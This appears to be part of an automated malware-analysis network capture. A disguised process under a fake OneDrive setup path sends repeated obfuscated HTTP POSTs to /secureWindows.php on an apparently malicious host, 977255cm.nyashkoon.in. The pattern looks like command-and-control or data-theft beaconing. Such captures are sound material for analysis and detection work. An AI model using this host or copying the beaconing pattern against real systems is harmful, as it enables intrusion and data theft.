                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYTcIOFFjgVLBTMpt6FCIs%2FN0%2BmgbmCc3wOjJzOsU0d6nDXu0J52TTj9B0OJZInl6DEo4IRnlEzfwZabXpGpdRbkP0pqVolfUfvQ%2BfQROIN3SOOJYAkj8iuFulgJ0%2FJyrVcTT9RGZ7M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1883c543ac0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2156&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=538490&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        106  192.168.2.4  50057  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:37.489413023 CET  286  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:37.842703104 CET  1076  OUT  Data Raw: 57 51 5c 51 50 59 56 53 58 57 50 59 55 51 5b 53 54 58 5c 5f 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\QPYVSXWPYUQ[STX\_YWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8 :=+='-7C:& [$=<Y,:/ 9$%#\?C)['(-:: F$,Z*
                                                        Oct 30, 2024 05:23:38.077231884 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:38.275430918 CET  792  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOL4leUlzT5vDr9Qq4RG6%2FgLqeKn3os%2Fqz78%2BQZ98NjS4vib0gkAk0sTHu%2FV0fGJYAXJIy2F2g4kG54s6tnc97xLGHVPdTw6Rw%2BeBaU%2F8VEovVgL5kE2goOyHqrGUPH9lvKdAgM7JH4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a18ea9e52d3f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1373814&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        107  192.168.2.4  50064  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:38.403841972 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:38.763668060 CET  1072  OUT  Data Raw: 57 57 5c 56 55 5f 53 56 58 57 50 59 55 58 5b 5d 54 5d 5c 5c 59 54 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\VU_SVXWPYUX[]T]\\YTZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/"Y+8:]3>;A9%&;;<Z 24($- F$,Z*
                                                        Oct 30, 2024 05:23:39.205126047 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:39.218796968 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:39.227893114 CET  788  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhinxqybpNM%2Fc0GkmSFHZThxejQH25OEsVh9yNjquGehNQGzODIVBJQh0%2F58nDCf49qy97%2Fhao3VwShL2Uxxq7zh3fzcrH0es6Ax2ISd12gg7dUhTGT3%2B04dq3HvIhQscVdD0yDREdw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a19469d62c99-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1408560&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        108  192.168.2.4  50070  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:39.361871958 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:39.714701891 CET  1072  OUT  Data Raw: 57 53 59 56 55 5f 56 51 58 57 50 59 55 58 5b 53 54 5c 5c 5f 59 50 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WSYVU_VQXWPYUX[ST\\_YPZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,0:=;23<90\%<Z8)'7:#[2X+%^$&- F$,Z*
                                                        Oct 30, 2024 05:23:39.966705084 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:40.178066015 CET  783  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzFcgcA89O6cP%2BjLNhBLsVaEhF6kxLlzRnuw9RL9VhPyKtNBmpDr4jwIn6E3Jf1jqHT5humyv8A8WvPp3f2VLPtpmNWT53LBeCH4jQ1KQrwTHudhn%2Bafz4ZBxPnZwiXrk9gemZoOYCU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a19a7eef2c9d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=659380&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        109  192.168.2.4  50076  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:40.310731888 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        110  192.168.2.4  50078  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:40.430283070 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:40.777316093 CET  1340  OUT  Data Raw: 57 57 59 52 50 5f 56 5d 58 57 50 59 55 59 5b 59 54 5f 5c 5d 59 51 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WWYRP_V]XWPYUY[YT_\]YQZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;9<^2\3[<.5,%.;-*":8&: <%5[&8^-: F$,Z*!
                                                        Oct 30, 2024 05:23:41.033451080 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:41.247637033 CET  930  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JyIaOqsHr2tsQ1%2Bg8eUK4RNWbScZjgbhM4pZnkNJ5Sgfq0PkHhKiYB7Nls2UMqH1eYbK9wlUFYUFrLf5FER9BhTKPpEtHXCT7MWRhiyHmm9%2B4asTYGRR8pSH3gw%2FhlLbh4AXevK2VA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1a11c316c26-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1017&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1411306&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 55 3f 01 34 56 26 0a 2e 5d 29 2f 2d 5a 29 10 2e 5f 33 32 2c 5f 32 12 08 58 3f 2b 02 00 3e 0a 30 12 28 0b 33 00 20 25 20 12 2a 3b 2f 46 0c 10 27 10 24 0b 3b 1e 2b 55 3a 05 2b 38 33 58 23 33 32 11 3e 07 33 56 35 33 20 58 30 08 22 53 2c 2d 26 10 2d 36 35 03 3a 20 28 52 3f 2a 21 57 08 14 22 58 26 05 38 01 31 04 20 16 26 54 36 58 20 3f 3b 5b 22 15 36 1e 3f 3b 28 52 26 0e 16 1d 26 20 23 57 31 3a 30 5c 2b 31 33 56 25 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a
                                                        Data Ascii: 98&U?4V&.])/-Z)._32,_2X?+>0(3 % *;/F'$;+U:+83X#32>3V53 X0"S,-&-65: (R?*!W"X&81 &T6X ?;["6?;(R&& #W1:0\+13V%3"R. V2XS
                                                        Oct 30, 2024 05:23:41.247664928 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        111  192.168.2.4  50082  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:40.555111885 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:40.902273893 CET  1076  OUT  Data Raw: 52 50 5c 57 55 55 53 57 58 57 50 59 55 5b 5b 5a 54 59 5c 54 59 5c 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\WUUSWXWPYU[[ZTY\TY\ZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8&_<'[ -% \$-[;:<]7[&_,?%%'89Z/* F$,Z*)
                                                        Oct 30, 2024 05:23:41.160141945 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:41.353987932 CET  789  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8hGcbX86Mr206SEXyqrMtZFQc%2Bdka4uOSusiAdYwpqfjsy3HvHyAjaPAZ%2Fljzltn5zOwGEQeBgm6%2B5cYagb%2B4kF4YzkEBMeGaZA%2BwIpxVoWzFLRO%2FG%2BvOGRudNNa7lI5hA6qUMmM5eM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1a1ebca6b06-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1404461&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:41.354083061 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        112  192.168.2.4  50088  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:41.488814116 CET  286  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:41.842777967 CET  1076  OUT  Data Raw: 57 50 5c 51 55 5b 56 54 58 57 50 59 55 5b 5b 5b 54 5c 5c 55 59 57 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\QU[VTXWPYU[[[T\\UYWZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/0=;.X$=4.7&;8+ ?[%)/<%'(%_: F$,Z*)
                                                        Oct 30, 2024 05:23:42.084770918 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:42.278170109 CET  787  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSmkyd9QH7jRXKkp5YQEfT7L9K0ITyoVRyzPxkExaSMI06stfJjMWxu%2F36XSJU132H%2BJIgmNgyf%2FSAJz9w5DtGJwB3d5IkUxOWM2VFFFItOSXKlkUCSzSF%2BshCXL1Ocy8h461tOD2Og%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1a7ac944760-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1900&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=774745&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        113  192.168.2.4  50094  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:42.403038025 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:42.762444973 CET  1076  OUT  Data Raw: 57 57 5c 50 50 5f 53 50 58 57 50 59 55 5b 5b 5e 54 5e 5c 5e 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\PP_SPXWPYU[[^T^\^YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/#:<;>]' .<Z%0Y/: )+X&9#<6)&8!. F$,Z*)
                                                        Oct 30, 2024 05:23:43.195297956 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:43.214874029 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:43.318422079 CET  778  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tef8r2vd18N1bUZwnnORi78IEfvFvJESzlF2MwCnBXh9lEqLTy0S9lxCP9RSfm57nkP20UcSblne3jNKjNI0iebw2qRIQ6BOQm7TTATwmop32AnJqXFYNLGYxyyjlQfRU9d54TIlFFo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1ad6c1b0bbe-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1389&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=962126&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        114  192.168.2.4  50100  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:43.475955009 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:43.829336882 CET  1076  OUT  Data Raw: 52 50 59 56 55 54 56 5d 58 57 50 59 55 50 5b 5a 54 53 5c 5b 59 55 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYVUTV]XWPYUP[ZTS\[YUZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,*Y+^.$=-%&= /*< 19/)520-* F$,Z*
                                                        Oct 30, 2024 05:23:44.064430952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:44.369977951 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuvIDbptRky%2BiV1z7eOEwcz9ncmJ7M31th%2FBW1RNdVCem1ihdpcd6vUghZUfhRbwcBNIbhyH9OO1LHJYvJwkVOVYglwdY%2BFKjRim9ZSEwJXGKpiGgDxhhD49NWY9ZL9FCSGbInKujtQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1b40a5b4696-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1500&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1180114&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        115 | 192.168.2.4 | 50106 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:44.497406960 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:44.855449915 CET | 1072 | OUT | Data Raw: 57 52 5c 54 55 5a 56 56 58 57 50 59 55 58 5b 58 54 5c 5c 59 59 50 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\TUZVVXWPYUX[XT\\YYPZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/0]?^&\'>(.C4&_/\<Z */2*?_?"'- F$,Z*-
                                                        Oct 30, 2024 05:23:45.096415997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:45.299355030 CET | 789 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
